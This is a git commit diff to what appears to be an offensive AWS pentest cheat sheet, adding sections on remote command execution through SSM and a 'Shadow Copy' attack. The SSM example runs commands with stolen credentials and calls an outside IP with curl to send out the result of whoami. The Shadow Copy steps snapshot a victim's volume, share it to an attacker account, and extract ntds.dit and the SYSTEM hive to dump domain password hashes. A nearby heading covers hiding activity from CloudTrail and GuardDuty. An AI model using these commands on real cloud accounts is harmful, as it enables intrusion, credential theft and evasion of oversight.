AWS SSM + Shadow copy attack
parent
5d87804f71
commit
1f3a94ba88
|
@ -18,6 +18,7 @@
|
|||
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
|
||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||
* [PenTest:IAMUser/KaliLinux](#)
|
||||
* [PenTest:IAMUser/ParrotLinux](#)
|
||||
|
@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
|||
|
||||
## AWS - SSM - Command execution
|
||||
|
||||
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
||||
|
||||
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
||||
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
||||
* Windows Server 2016 and 2019
|
||||
* Amazon Linux
|
||||
* Amazon Linux 2
|
||||
* Ubuntu Server 16.04
|
||||
* Ubuntu Server 18.04
|
||||
* Amazon ECS-Optimized
|
||||
|
||||
```powershell
|
||||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||
|
||||
e.g:
|
||||
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
||||
```
|
||||
|
||||
## AWS - Golden SAML Attack
|
||||
|
@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
|
|||
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
||||
```
|
||||
|
||||
## AWS - Shadow Copy attack
|
||||
|
||||
Prerequisite:
|
||||
* EC2:CreateSnapshot
|
||||
* CloudCopy - https://github.com/Static-Flow/CloudCopy
|
||||
|
||||
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
|
||||
2. Run `"Describe-Instances"` and show in list for attacker to select
|
||||
3. Run `"Create-Snapshot"` on volume of selected instance
|
||||
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
|
||||
5. Load AWS CLI with Attacker Credentials
|
||||
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
|
||||
7. Ssh run `"sudo mkdir /windows"`
|
||||
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
|
||||
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
|
||||
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
|
||||
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
|
||||
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
|
||||
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||
|
||||
|
||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||
|
||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||
|
|
Loading…
Reference in New Issue